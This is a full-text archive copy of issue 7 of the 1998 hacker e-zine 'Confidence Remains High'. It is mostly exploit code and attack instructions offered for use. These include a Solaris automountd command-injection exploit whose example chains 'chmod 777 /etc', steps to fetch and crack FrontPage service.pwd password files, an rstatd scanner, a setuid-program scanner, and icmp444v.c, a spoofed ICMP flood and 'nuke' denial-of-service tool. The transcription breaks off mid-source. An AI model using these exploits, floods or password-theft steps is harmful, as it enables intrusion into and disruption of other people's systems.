home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / magazines / crh / crh007.txt < prev    next >
Encoding:
Text File  |  1998-06-25  |  65.6 KB  |  1,962 lines

  1. ──────────────────────────────────────────────────────────────────────────────
  2.         . [cZo] .          Team CodeZero Presents            . [cZo] .
  3. ──────────────────────────────────────────────────────────────────────────────
  4.  
  5.  
  6.       /IIIIIIIIII          /IIIIIIIIII           /III   /III
  7.       \ III_____/          \ III___/III          \ III  \ III
  8.        \ III                \ III  \ III          \ III  \_III
  9.         \ III  onfidence     \ IIIIIIII  emains    \ IIIIIIIIII  igh
  10.          \ III                \ III__/III           \ III__/ III
  11.           \ III                \ III  \ III          \ III  \ III
  12.            \ IIIIIIIIII   ___   \ III  \ III   ___    \ III  \ III   ___
  13.             \_________/  /\__\   \__/   \__/  /\__\    \__/   \__/  /\__\
  14.                          \/__/                \/__/                 \/__/
  15.  
  16.  
  17. ──────────────────────────────────────────────────────────────────────────────
  18.                                                                       Issue 7
  19.                                                             31st January 1998
  20. ───────────────────────────────────────────────────────────────────────────────
  21.  
  22.                              Editors : so1o and sw1tch
  23.  
  24.                             Gorgeous : dangergrl
  25.  
  26.                    Site of the month : www.dangergrl.com  <-- go there now.
  27.         
  28.                            The usual : om3n, zer0x, xFli, electro,
  29.                                        Spheroid, el8, ultima and chameleon
  30.  
  31.                        Not forgotten : loss, organik, peenut, pzn, suid
  32.                                        helix and manly
  33.  
  34.                    Special thanks to : Shok and vacuum
  35.  
  36.                 Kick in the teeth to : dscan@hotmail.com
  37.  
  38.  VB coder kids who think they r Gods : www.sinnerz.com  (NOT LYNX FRIENDLY)
  39.  
  40.  
  41.                      .-----------[ An Official ]-----------.
  42.                      :      .-----.  .----.   .--.--.      :
  43.                      :      :  .--'  : .-. :  :  :  :      :
  44.                      !_-::  :  :     : `-' ;  :  .  :  ::-_!
  45.                      :~-::  :: :     :: . :   ::    :  ::-~:
  46.                      :      ::.`--.  ::.:  :  ::.:  :      :
  47.                      :      `-----'  `--'--'  `--'--'      :
  48.                      !_-::                             ::-_!
  49.                      :~-::-[ Confidence Remains High ]-::-~:
  50.                      :~-::                             ::-~:
  51.                      `-----------[ Production ]------------'
  52.  
  53.  
  54. ───────────────────────────────────────────────────────────────────────────────
  55.   In This "Added Vitamins" Issue : 
  56. ───────────────────────────────────────────────────────────────────────────────
  57.  
  58. ------=>  Section A  :  Introduction And Cover Story.
  59.  
  60.     1. Confidence Remains High issue 7....................: Tetsu Khan
  61.     2. The D-Lab..........................................: so1o
  62.  
  63. ------=>  Section B  :  Exploits And Code.
  64.  
  65.     1. ipwatch.c..........................................: Deathstar
  66.     2. Automountd remote exploit for SunOS 5.5.1..........: *unknown*
  67.     3. statscan.c - statd scanner.........................: BiT
  68.     4. FrontPage exploit..................................: chameleon / vacuum
  69.     5. sunscan.sh.........................................: so1o
  70.     6. classb.c...........................................: falken
  71.     7. icmp444v.c.........................................: e4elite
  72.  
  73. ------=>  Section C  :  Phones / Scanning / Radio.
  74.  
  75.     1. Realistic Pro-50 scanner discriminator mod.........: xFli
  76.  
  77. ------=>  Section D  :  Miscellaneous.
  78.  
  79.     1. rpc-stat.pgp.......................................: so1o
  80.     2. If you're really dumb..............................: so1o
  81.     3. inetd backdoors....................................: Phreak-0
  82.     4. 0wned..............................................: so1o
  83.     5. dnscan.............................................: sw1tch
  84.     6. The issues list for 1998...........................: so1o
  85.  
  86. ------=>  Section E  :  World News.
  87.  
  88.     1. SpiceWorld hacked..................................: sw1tch
  89.     2. zeon.net...........................................: ch-e-ztic
  90.  
  91. -------=> Section F  :  Projects.
  92.  
  93.     1. TOTALCON '98.......................................: so1o
  94.  
  95. ------=> Section G  :  FIN.
  96.  
  97. ───────────────────────────────────────────────────────────────────────────────
  98. ===============================================================================
  99. ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
  100. ===============================================================================
  101. ───────────────────────────────────────────────────────────────────────────────
  102.   1. Confidence Remains High issue 7 : Tetsu Khan
  103. ───────────────────────────────────────────────────────────────────────────────
  104.  
  105. Welcome to issue 7 of the popular Confidence Remains High, as always, due to
  106. our equality policy, as we assume nothing, there may be some parts that some
  107. of you may dislike and think below you, as well as being some parts you
  108. actually learn something from, as always, we hope you enjoy this issue, and
  109. those to come in the future..
  110.  
  111. If you have a BBS, a webpage, ftp site, or anywhere where CRH is distributed,
  112. get in touch with us on irc, or mail us at tk85@hotmail.com, and we'll give
  113. you a mention and shit..
  114.  
  115. The distro list..
  116. =================
  117.  
  118.    www.d-lab.com.ar                                 /crh/
  119.    www.technotronic.com                             /ezines/crh/
  120.    cybrids.simplenet.com                            /Toast/files/CRH/
  121.    ftp.linuxwarez.com                               /pub/crh/
  122.    ftp.sekurity.org                                 /users/so1o/
  123.   
  124. Also go to..
  125. ============
  126.  
  127.    www.dangergrl.com  <-- Go there now
  128.    rhino9.abyss.com   <-- NT security
  129.    www.hacked.net     <-- Archive of all the stuff we have 0wned.
  130.  
  131. ───────────────────────────────────────────────────────────────────────────────
  132.   2. The D-Lab : so1o
  133. ───────────────────────────────────────────────────────────────────────────────
  134.  
  135. Our member chameleon set us up with a domain in Argentina, the D-Lab.. It has
  136. some mad shit on it, but you have to know where to look, because
  137. www.d-lab.com.ar will take you nowhere, it has 0-day exploits on it, as
  138. well as other useful stuff and source code, check it out..
  139.  
  140.   http://www.d-lab.com.ar/sekret/warez/
  141.   http://www.d-lab.com.ar/mad/
  142.   http://www.d-lab.com.ar/crh/
  143.  
  144. Don't forget to check out http://www.dangergrl.com, it's our site of the month!
  145.  
  146. ───────────────────────────────────────────────────────────────────────────────
  147. ===============================================================================
  148. ==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]==
  149. ===============================================================================
  150. ───────────────────────────────────────────────────────────────────────────────
  151.   1. ipwatch.c : Deathstar
  152. ───────────────────────────────────────────────────────────────────────────────
  153.  
  154. ..this code is over 2 years old now, and alot of people have it, so here it is
  155.   on public release, heh, it r0x anyway.. allows you to view any connection
  156.   on a Linux box in real time!@# it's like 69k so we've just added it in the
  157.   crh007.zip, usage is like all in the interface, it just r00lz supr3me!
  158.  
  159. ───────────────────────────────────────────────────────────────────────────────
  160.   2. Automountd remote exploit for SunOS 5.5.1 : *unknown*
  161. ───────────────────────────────────────────────────────────────────────────────
  162.  
  163. /*
  164.  
  165.  this is really dumb automountd exploit, tested on solaris 2.5.1
  166.  ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on, 
  167.  map is executed via popen with key given as argument, read automount(1M)
  168.  
  169.  patch 10465[45] fixes this
  170.  
  171.  */
  172.  
  173. #include <sys/types.h>
  174. #include <sys/time.h>
  175. #include <stdio.h>
  176. #include <netdb.h>
  177. #include <rpc/rpc.h>
  178. #include <rpcsvc/autofs_prot.h>
  179.  
  180. #define AUTOTS "datagram_v" /* XXX */
  181.  
  182. void usage(char *s) {
  183.   printf("Usage: %s mountpoint map key [opts]\n", s);
  184.   exit(0);
  185. }
  186.  
  187. bool_t
  188. xdr_mntrequest(xdrs, objp)
  189.         register XDR *xdrs;
  190.         mntrequest *objp;
  191. {
  192.  
  193.         register long *buf;
  194.  
  195.         if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
  196.                 return (FALSE);
  197.         if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
  198.                 return (FALSE);
  199.         if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
  200.                 return (FALSE);
  201.         if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
  202.                 return (FALSE);
  203.         return (TRUE);
  204. }
  205.  
  206. bool_t
  207. xdr_mntres(xdrs, objp)
  208.         register XDR *xdrs;
  209.         mntres *objp;
  210. {
  211.  
  212.         register long *buf;
  213.  
  214.         if (!xdr_int(xdrs, &objp->status))
  215.                 return (FALSE);
  216.         return (TRUE);
  217. }
  218.  
  219. main(int argc, char *argv[]) {
  220.   char hostname[MAXHOSTNAMELEN];
  221.   CLIENT *cl;
  222.   enum clnt_stat stat;
  223.   struct timeval tm;
  224.   struct mntrequest req;
  225.   struct mntres result;
  226.  
  227.   if (argc < 4)
  228.     usage(argv[0]);
  229.   
  230.   req.path=argv[1];
  231.   req.map=argv[2];
  232.   req.name=argv[3];
  233.   req.opts=argv[4];
  234.   if (gethostname(hostname, sizeof(hostname)) == -1) {
  235.     perror("gethostname");
  236.     exit(0);
  237.   }
  238.   if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
  239.     clnt_pcreateerror("clnt_create");
  240.     exit(0);
  241.   }
  242.   tm.tv_sec=5;
  243.   tm.tv_usec=0;
  244.   stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
  245.         (char *)&result, tm);
  246.   if (stat != RPC_SUCCESS)
  247.     clnt_perror(cl, "mount call"); 
  248.   else 
  249.     printf("mntres = %d.\n", result.status);
  250.   clnt_destroy(cl);
  251. }
  252.  
  253. ───────────────────────────────────────────────────────────────────────────────
  254.   3. statscan.c - statd scanner : BiT
  255. ───────────────────────────────────────────────────────────────────────────────
  256.  
  257. /* 
  258.  
  259.  statd scanner by BiT,
  260.  rpc shit ripped from rpcinfo, woopy!
  261.  its done for now
  262.  
  263.  -- works fine from Linux boxes, just compile / follow usage. -so1o
  264.  
  265.  */
  266.  
  267. #include <stdio.h>
  268. #include <stdlib.h>
  269. #include <netdb.h>
  270. #include <signal.h>
  271. #include <sys/socket.h>
  272. #include <netinet/in.h>
  273. #include <arpa/inet.h>
  274. #include <netinet/ip.h>
  275. #include <rpc/rpc.h>
  276. #include <rpc/pmap_prot.h>
  277. #include <rpc/pmap_clnt.h>
  278.  
  279. #define VER "0.03"
  280.  
  281. int statd(char *host);
  282. unsigned long int res(char *p);
  283. void woopy(int s);
  284. void usage(char *s);
  285. void scan(char *i, char *o);
  286.  
  287. void usage(char *s)
  288. {
  289.   printf("Usage: %s inputfile outputfile\n",s);
  290.   exit(-1);
  291. }
  292.  
  293. void main(int argc, char **argv)
  294. {
  295.   printf("%s %s by BiT'97\n\n",argv[0],VER);
  296.   if(argc<3)
  297.     usage(argv[0]);
  298.   scan(argv[1],argv[2]);
  299. }
  300.  
  301. void scan(char *i, char *o)
  302. {
  303.   FILE *iff, *of;
  304.   char buf[512];
  305.   
  306.   if((iff=fopen(i,"r")) == NULL)
  307.     return;
  308.   while(fgets(buf,512,iff) != NULL) 
  309.   {
  310.     if(buf[strlen(buf)-1]=='\n')
  311.       buf[strlen(buf)-1]=0;
  312.     if(statd(buf) && (of=fopen(o,"a")) != NULL) {
  313.       buf[strlen(buf)+1]=0;
  314.       buf[strlen(buf)]='\n';
  315.       
  316.       fputs(buf,of);
  317.       fclose(of);
  318.     }  
  319.   }
  320.   fclose(iff);
  321. }
  322.  
  323. void woopy(int s)
  324. {
  325.   return;
  326. }
  327.  
  328. int statd(char *host)
  329. {
  330.   struct sockaddr_in server_addr;
  331.   struct pmaplist *head = NULL;
  332.   int sockett = RPC_ANYSOCK;
  333.   struct timeval minutetimeout;
  334.   register CLIENT *client;
  335.   struct rpcent *rpc;
  336.  
  337.   server_addr.sin_addr.s_addr=res(host);
  338.   server_addr.sin_family=AF_INET;
  339.   server_addr.sin_port = htons(PMAPPORT);
  340.   minutetimeout.tv_sec = 15;
  341.   minutetimeout.tv_usec = 0;
  342.   
  343.   /* cause clnttcp_create uses connect() */
  344.   signal(SIGALRM,woopy);
  345.   alarm(15);
  346.   
  347.   if ((client = clnttcp_create(&server_addr, PMAPPROG,
  348.       PMAPVERS, &sockett, 50, 500)) == NULL) {
  349.     alarm(0);
  350.     signal(SIGALRM,SIG_DFL);
  351.     return 0;
  352.   }
  353.   alarm(0);
  354.   signal(SIGALRM,SIG_DFL);
  355.   
  356.   if (clnt_call(client, PMAPPROC_DUMP, (xdrproc_t) xdr_void, NULL, 
  357.       (xdrproc_t) xdr_pmaplist, &head, minutetimeout) != RPC_SUCCESS)
  358.     return 0;
  359.   if (head != NULL) 
  360.     for (; head != NULL; head = head->pml_next)
  361.       if((rpc = getrpcbynumber(head->pml_map.pm_prog)))
  362.         if(strcmp(rpc->r_name,"rstatd") == 0)
  363.           return 1;              
  364.    
  365.   return 0;
  366. }
  367.  
  368. unsigned long int res(char *p)
  369. {
  370.    struct hostent *h;
  371.    unsigned long int rv;
  372.     
  373.    h=gethostbyname(p);
  374.    if(h!=NULL)
  375.      memcpy(&rv,h->h_addr,h->h_length);
  376.    else
  377.      rv=inet_addr(p);
  378.    return rv;
  379. }
  380.  
  381. ───────────────────────────────────────────────────────────────────────────────
  382.   4. FrontPage exploit : chameleon / vacuum
  383. ───────────────────────────────────────────────────────────────────────────────
  384.                     
  385. If a system is running FrontPage extensions, then you can do the following to
  386. pull their service.pwd password file...
  387.  
  388.      http://www.site.here.com/_vti_pvt/service.pwd
  389.  
  390. Most of the time this will return a password file with around 4 lines in it,
  391. the passwords will be encrypted, but if you use L0phTCrack 1.5 (available from
  392. www.l0pht.com), then you can break the encryption.
  393.  
  394. if the service.pwd doesn't exist, then check out the files in /_vti_pvt, as
  395. they will be listed straight off.
  396.  
  397. Also, certain users may have FrontPage extensions installed, so try URL's
  398. like...
  399.  
  400.      http://www.site.here.com/~mike/_vti_pvt/service.pwd
  401.  
  402. We're sure you get the idea, a simple yet affective exploit.
  403.  
  404. ───────────────────────────────────────────────────────────────────────────────
  405.   5. sunscan.sh : so1o
  406. ───────────────────────────────────────────────────────────────────────────────
  407.  
  408. #!/bin/sh
  409. #
  410. # exploit scanner for SunOS 5.5.x (solaris 2.5.x)
  411. # by so1o@d-lab.com.ar
  412. #
  413. # Simple little shell script that will quickly scan SunOS 5.5.x boxes for
  414. # local holes, if your dumb, this is how you run it..
  415. #
  416. # % uname -a
  417. # Sun Microsystems SunOS 5.5.1 sparc blah blah blah..
  418. # % sh sunscan.sh
  419. #
  420. # if the system isn't running SunOS 5.5.1, then the script will still work,
  421. # but exploits may not be available for certain programs under SunOS 4.1.x
  422. # or whatever you run the scanner on.
  423. #
  424.  
  425. echo " .o. Scanning for all known exploitable programs now, Please be patient..."
  426.  
  427. if [ -s /tmp/report ]; then
  428.         cp /tmp/report /tmp/report.old
  429.         echo " .o. Moving old report file to /tmp/report.old"
  430. else
  431.         echo " .o. Preparing report file at /tmp/report"
  432. fi
  433.  
  434. if [ -s /tmp/suidprogs ]; then
  435.         rm /tmp/suidprogs
  436.         echo " .o. Deleting old log files..."
  437. else
  438.         echo " .o. No old log files detected..."
  439. fi
  440.  
  441. echo " "
  442. echo "  Team CodeZero Solaris Security Tool Version 1.0 Report :" > /tmp/report
  443. echo "  ========================================================" >> /tmp/report
  444. echo " " >> /tmp/report
  445.  
  446. if [ -s /bin/passwd ]; then
  447. echo " .o. /bin/passwd exists, checking for vunerabilities..."
  448.         if test -u /bin/passwd
  449.         then
  450.                 echo " .o. /bin/passwd is suid and seems exploitable."
  451.                 echo "  .o. The scanner found /bin/passwd could be exploitable." >> /tmp/report
  452.                 echo "/bin/passwd" > /tmp/suidprogs
  453.         else
  454.                 echo " .o. /bin/passwd is not exploitable."
  455.         fi
  456. else
  457.         echo " .o. /bin/passwd doesn't exist!"
  458. fi
  459.  
  460. if [ -s /bin/eject ]; then
  461. echo " .o. /bin/eject exists, checking for vunerabilities..."
  462.         if test -u /bin/eject
  463.         then
  464.                 echo " .o. /bin/eject is suid and seems exploitable."
  465.                 echo "  .o. The scanner found /bin/eject could be exploitable." >> /tmp/report
  466.                 echo "/bin/eject" >> /tmp/suidprogs
  467.         else
  468.                 echo " .o. /bin/eject is not exploitable."
  469.         fi
  470. else
  471.         echo " .o. /bin/eject doesn't exist!"
  472. fi
  473.  
  474.  
  475. if [ -s /bin/fdformat ]; then
  476. echo " .o. /bin/fdformat exists, checking for vunerabilities..."
  477.         if test -u /bin/fdformat
  478.         then
  479.                 echo " .o. /bin/fdformat is suid and seems exploitable."
  480.                 echo "  .o. The scanner found /bin/fdformat could be exploitable." >> /tmp/report
  481.                 echo "/bin/fdformat" >> /tmp/suidprogs
  482.         else
  483.                 echo " .o. /bin/fdformat is not exploitable."
  484.         fi
  485. else
  486.         echo " .o. /bin/fdformat doesn't exist!"
  487. fi
  488.  
  489. if [ -s /usr/sbin/ffbconfig ]; then
  490. echo " .o. /usr/sbin/ffbconfig exists, checking for vunerabilities..."
  491.         if test -u /usr/sbin/ffbdonfig
  492.         then
  493.                 echo " .o. /usr/sbin/ffbconfig is suid and seems exploitable."
  494.                 echo "  .o. The scanner found /usr/sbin/ffbconfig could be exploitable." >> /tmp/report
  495.                 echo "/usr/sbin/ffbconfig" >> /tmp/suidprogs
  496.         else
  497.                 echo " .o. /usr/sbin/ffbconfig is not exploitable."
  498.         fi
  499. else
  500.         echo " .o. /usr/sbin/ffbconfig doesn't exist!"
  501. fi
  502.  
  503. if [ -s /usr/bin/rlogin ]; then
  504. echo " .o. /usr/bin/rlogin exists, checking for vunerabilities..."
  505.         if test -u /usr/bin/rlogin
  506.         then
  507.                 echo " .o. /usr/bin/rlogin is suid and seems exploitable."
  508.                 echo "  .o. The scanner found /usr/bin/rlogin could be exploitable." >> /tmp/report
  509.                 echo "/usr/bin/rlogin" >> /tmp/suidprogs
  510.         else
  511.                 echo " .o. /usr/bin/rlogin is not exploitable."
  512.         fi
  513. else
  514.         echo " .o. /usr/bin/rlogin doesn't exist!"
  515. fi
  516.  
  517. if [ -s /usr/dt/bin/sdtcm_convert ]; then
  518. echo " .o. /usr/dt/bin/sdtcm_convert exists, checking for vunerabilities..."
  519.         if test -u /usr/dt/bin/sdtcm_convert
  520.         then
  521.                 echo " .o. /usr/dt/bin/sdtcm_convert is suid and seems exploitable."
  522.                 echo "  .o. The scanner found /usr/dt/bin/sdtcm_convert could be exploitable." >> /tmp/report
  523.                 echo "/usr/dt/bin/sdtcm_convert" >> /tmp/suidprogs
  524.         else
  525.                 echo " .o. /usr/dt/bin/sdtcm_convert is not exploitable."
  526.         fi
  527. else
  528.         echo " .o. /usr/dt/bin/sdtcm_convert doesn't exist!"
  529. fi
  530.  
  531. if [ -s /usr/X11/bin/xlock ]; then
  532. echo " .o. /usr/X11/bin/xlock exists, checking for vunerabilities..."
  533.         if test -u /usr/X11/bin/xlock
  534.         then
  535.                 echo " .o. /usr/X11/bin/xlock is suid and seems exploitable."
  536.                 echo "  .o. The scanner found /usr/X11/bin/xlock could be exploitable." >> /tmp/report
  537.                 echo "/usr/X11/bin/xlock" >> /tmp/suidprogs
  538.         else
  539.                 echo " .o. /usr/X11/bin/xlock is not exploitable."
  540.         fi
  541. else
  542.         echo " .o. /usr/X11/bin/xlock doesn't exist!"
  543. fi
  544.  
  545. if [ -s /usr/vmsys/bin/chkperm ]; then
  546.         echo " .o. The chkperm program exists, the chkperm technique should work..."
  547.         echo "  .o. The scanner found /usr/vmsys/bin/chkperm could be exploitable." >> /tmp/report
  548.         echo "/usr/vmsys/bin/chkperm" >> /tmp/suidprogs
  549. else
  550.         echo " .o. /usr/vmsys/bin/chkperm doesn't exist!"
  551. fi
  552.  
  553. echo " "
  554. echo " " >> /tmp/report
  555. echo "  End of report, this scanner was scripted by so1o@d-lab.com.ar" >> /tmp/report
  556. echo " "
  557. echo " .o. The scan is now complete, a report has been written to /tmp/report  .o."
  558. echo " "
  559. exit 0
  560.  
  561. ───────────────────────────────────────────────────────────────────────────────
  562.   6. classb.c : falken
  563. ───────────────────────────────────────────────────────────────────────────────
  564.  
  565. This will be useful to someone, somewhere..
  566.  
  567. /* the subnetting program */
  568. /* working version of a Class B subnetter falken@rune.org */
  569. /* Werd silitek */
  570.  
  571. #include <stdio.h>
  572. #include <stdio.h>
  573. #include <stdlib.h>
  574. #include <sys/socket.h>
  575. #include <sys/types.h>
  576. #include <netinet/in.h>
  577. #include <netinet/ip.h>
  578. #include <netinet/ip_icmp.h>
  579. #include <netdb.h>
  580.  
  581. void main(int argc,char *argv[]) 
  582.                 {
  583.                 int counter1=0;
  584.                 int counter2=0;
  585.                 while(counter2 < 256)
  586.                    {
  587.                        counter1++;
  588.                        if (counter1 == 255)
  589.                            { counter2++;counter1=0;};
  590.                          
  591.                        printf("%s.%i.%i\n",argv[1],counter2,counter1);
  592.                    };
  593.                 };
  594.  
  595. ───────────────────────────────────────────────────────────────────────────────
  596.   7. icmp444v.c : e4elite
  597. ───────────────────────────────────────────────────────────────────────────────
  598.  
  599. /*
  600.  
  601.    ICMP444V.c
  602.    Kickass ICMP client, does some phat shit, runs fine from Linux, should
  603.    also compile on a Sun, compile, then run for usage, or read this..
  604.  
  605.    To flood with echo spoofing :
  606.    -----------------------------
  607.    icmp444 E <spoof address> <ip of victim> <size of packet>
  608.  
  609.    eg : ~# icmp444 E www.nasa.gov ppp123.sucker.com 1000
  610.  
  611.    To overload the fucker      :
  612.    -----------------------------
  613.  
  614.    icmp444 O <spoof1> <spoof2> <ip of victim>
  615.  
  616.    eg : ~# icmp444 0 www.nasa.gov www.fbi.gov ppp42.sucker.com
  617.  
  618.    Bog standard ICMP nuke      :
  619.    -----------------------------
  620.  
  621.    icmp444 X <destination of packet> <port source> <ip of source>
  622.                  <port of destination++;> <code of icmp (eg. 2 )>
  623.  
  624.    eg : ~# icmp444 X irc.devil.com 6667 ppp45.sucker.com 1020 2
  625.  
  626.    To nuke an NT/Win96 box     :
  627.    -----------------------------
  628.  
  629.    icmp444 X <destination of packet> <port source++;> <ip of source>
  630.                                              <port of destination> 2
  631.  
  632.    eg : ~# icmp444 N  ppp56.sucker.com 1020 irc.devil.com 6667 2
  633.  
  634.  
  635.    e4elite [nWo]
  636.    
  637. */
  638.  
  639. #define IPHDRSIZE sizeof(struct iphdr)
  640. #define ICMPHDRSIZE sizeof(struct icmphdr)
  641.  
  642. #include <stdio.h>
  643. #include <stdlib.h>
  644. #include <unistd.h>
  645. #include <signal.h>
  646. #include <fcntl.h>
  647. #include <syslog.h>
  648. #include <sys/types.h>
  649. #include <sys/socket.h>
  650. #include <sys/wait.h>
  651. #include <sys/ioctl.h>
  652. #include <sys/stat.h>
  653. #include <netinet/in.h>
  654. #include <arpa/inet.h>
  655. #include <netdb.h>
  656. #include <linux/ip.h>
  657. #include <linux/icmp.h>
  658. #include <linux/tcp.h>
  659. #include <linux/udp.h>
  660. #include <netinet/ip_icmp.h>
  661.  
  662. #ifdef SYSV
  663. #define bcopy(s1,s2,len) memcpy(s2,s1,len)
  664. #endif
  665.  
  666. /*
  667.  * in_cksum --
  668.  *  Checksum routine for Internet Protocol family headers (C Version)
  669.  */
  670.  
  671. unsigned short in_cksum(addr, len)
  672.     u_short *addr;
  673.     int len;
  674. {
  675.     register int nleft = len;
  676.     register u_short *w = addr;
  677.     register int sum = 0;
  678.     u_short answer = 0;
  679.  
  680.     /*
  681.      * Our algorithm is simple, using a 32 bit accumulator (sum), we add
  682.      * sequential 16 bit words to it, and at the end, fold back all the
  683.      * carry bits from the top 16 bits into the lower 16 bits.
  684.      */
  685.  
  686.     while (nleft > 1)  {
  687.         sum += *w++;
  688.         nleft -= 2;
  689.     }
  690.  
  691.     /* mop up an odd byte, if necessary */
  692.  
  693.     if (nleft == 1) {
  694.         *(u_char *)(&answer) = *(u_char *)w ;
  695.         sum += answer;
  696.     }
  697.  
  698.     /* add back carry outs from top 16 bits to low 16 bits */
  699.  
  700.     sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
  701.     sum += (sum >> 16);         /* add carry */
  702.     answer = ~sum;              /* truncate to 16 bits */
  703.     return(answer);
  704. }
  705.  
  706. unsigned int host2ip(char *serv)
  707. {
  708.    struct sockaddr_in sin;
  709.    struct hostent *hent;
  710.       
  711.   hent=gethostbyname(serv);
  712.   if(hent == NULL) return 0;
  713.   bzero((char *)&sin, sizeof(sin));
  714.   bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length);
  715.   return sin.sin_addr.s_addr;
  716.  }
  717.  
  718.                      
  719. main(int argc, char **argv)
  720.    {
  721.         struct sockaddr_in sin_dst;
  722.     unsigned char packet[4098];
  723.     struct iphdr   *ip;
  724.     struct icmphdr *icmp;
  725.     struct iphdr    *ipfake;
  726.     unsigned char  *data;
  727.     
  728.      unsigned           s_port;
  729.      unsigned           t_port;
  730.                                
  731.     int s;
  732.         int i;
  733.     int DATA;
  734.     int s_portinc,t_portinc;
  735.     
  736.     ip = (struct iphdr *)packet;
  737.     icmp = (struct icmphdr *)(packet+IPHDRSIZE);
  738.     ipfake = (struct iphdr*)(packet+IPHDRSIZE+ICMPHDRSIZE );
  739.     data = (char *)(packet+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE);
  740.     
  741.     memset(packet, 0, 4098);
  742.     
  743.         printf(" ICMP444 ready for action!\n\n");
  744.     
  745.     if(argc == 1) {
  746.     
  747.         printf(" To flood with echo spoofing : \n");
  748.         printf(" icmp444 E <spoof address> <ip of victim> <size of packet>\n");
  749.         printf(" eg : ~# icmp444 E www.nasa.gov ppp123.sucker.com 1000\n\n");
  750.         printf(" To overload the fucker      : \n");
  751.         printf(" icmp444 O <spoof1> <spoof2> <ip of victim>\n");
  752.         printf(" eg : ~# icmp444 0 www.nasa.gov www.fbi.gov ppp42.sucker.com \n\n");
  753.         printf(" Bog standard ICMP nuke      : \n\n");
  754.         printf(" icmp444 X <destination of packet> <port source> <ip of source> <port of destination++;> <code of icmp (eg. 2 )> \n");
  755.         printf(" eg : ~# icmp444 X irc.devil.com 6667 ppp45.sucker.com 1020 2 \n\n");
  756.         printf(" To nuke an NT/Win96 box     : \n ");
  757.         printf(" icmp444 X <destination of packet> <port source++;> <ip of source> <port of destination> 2 \n"); 
  758.         printf(" eg : ~# icmp444 N  ppp56.sucker.com 1020 irc.devil.com 6667 2 \n\n");
  759.     
  760.     }
  761.     
  762.     /* OPEN A RAW_SOCKET ! */;
  763.     
  764.      s=socket(AF_INET, SOCK_RAW, 255);
  765.             if(s < 0)
  766.             {
  767.                 fprintf(stderr, "can't open raw socket\n");
  768.             exit(0);
  769.             }
  770.     
  771.     #ifdef IP_HDRINCL
  772.      if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&i, sizeof(i)) < 0)
  773.           {
  774.             fprintf(stderr, "cant set IP_HDRINCL\n");
  775.              close(s);
  776.             exit(0); }
  777.     #endif
  778.                                                         
  779.     
  780.     if (*(argv[1]+0)=='E'){
  781.     
  782.     DATA=atoi(argv[4]);
  783.     
  784.     ip->saddr    = host2ip(argv[2]);
  785.     ip->daddr    = host2ip(argv[3]);
  786.     ip->version  = 4;
  787.     ip->ihl      = 5; 
  788.     ip->ttl      = 255;
  789.     ip->protocol = 1; 
  790.     ip->tot_len  = htons(IPHDRSIZE +ICMPHDRSIZE+DATA);
  791.     ip->tos      = 0;
  792.     ip->id       = 0;
  793.     ip->frag_off = 0;
  794.     ip->check    = in_cksum(packet,IPHDRSIZE);
  795.     
  796.     icmp->type = 8; 
  797.     icmp->code = 0;
  798.     
  799.     icmp->checksum = in_cksum(icmp,ICMPHDRSIZE+DATA); 
  800.     
  801.     sin_dst.sin_addr.s_addr = ip->daddr;
  802.         sin_dst.sin_family = AF_INET; 
  803.         printf(" HEY! %s u r dead  \n",argv[3] );
  804.     for(;;){
  805.  
  806.     sendto(s,packet,IPHDRSIZE+ICMPHDRSIZE+DATA,0,
  807.           (struct sockaddr *)&sin_dst,sizeof(struct sockaddr)); }
  808.     
  809.      }
  810.  
  811. if (*(argv[1]+0)=='O'){
  812.  
  813.      unsigned int IP1;
  814.      unsigned int IP2;
  815.      
  816.      IP1= host2ip(argv[2]); 
  817.      IP2 = host2ip(argv[3]);   
  818.      ip->daddr    =  host2ip(argv[4]);
  819.                   
  820.      ip->version  = 4;
  821.      ip->ihl      = 5;
  822.      ip->ttl      = 255;
  823.      ip->protocol = 1;
  824.      ip->tot_len  = htons(IPHDRSIZE +ICMPHDRSIZE );
  825.      ip->id       = 2;
  826.      ip->frag_off = 0;
  827.      ip->tos      = 0; 
  828.             
  829.      ip->check    = in_cksum(packet,IPHDRSIZE); 
  830.     icmp->type = 3;
  831.     icmp->code = 5;
  832.     icmp->checksum = 1234;             
  833.     printf(" HEY! %s  are you on a fucking 8086?  \n",argv[4] );                                           
  834.   
  835.   for(;;){
  836.     ip->saddr = IP1;
  837.     sin_dst.sin_addr.s_addr = ip->daddr;
  838.     sin_dst.sin_family = AF_INET;
  839.     
  840.     sendto(s,packet,IPHDRSIZE+ICMPHDRSIZE,0,
  841.            (struct sockaddr *)&sin_dst,sizeof(struct sockaddr)); 
  842.     
  843.     ip->saddr = IP2;
  844.     sin_dst.sin_addr.s_addr = ip->daddr;
  845.     
  846.     sendto(s,packet,IPHDRSIZE+ICMPHDRSIZE,0,
  847.                (struct sockaddr *)&sin_dst,sizeof(struct sockaddr));
  848.             }
  849.   }
  850.  
  851. if(*(argv[1]+0)=='X'){ 
  852. s_portinc=0;
  853. t_portinc=1;
  854. goto go;
  855. if (*(argv[1]+0)=='N'){
  856.  
  857. s_portinc=1;
  858. t_portinc=0;
  859. go:
  860.  
  861.   
  862. ip->saddr    = host2ip(argv[4]);
  863. ip->daddr    = host2ip(argv[2]);
  864. s_port=atoi(argv[3]);
  865.  
  866. t_port=atoi(argv[5]);
  867.                                   
  868. ip->version  = 4;
  869. ip->ihl      = 5;
  870. ip->ttl      = 255;
  871. ip->protocol = 1;
  872. ip->tot_len  = htons(IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8);
  873. ip->tos      = 0;
  874. ip->id       = 2;
  875. ip->frag_off = 0;
  876. ip->check    = in_cksum(packet,IPHDRSIZE);
  877.                                                                                                   
  878.                                                                                                   
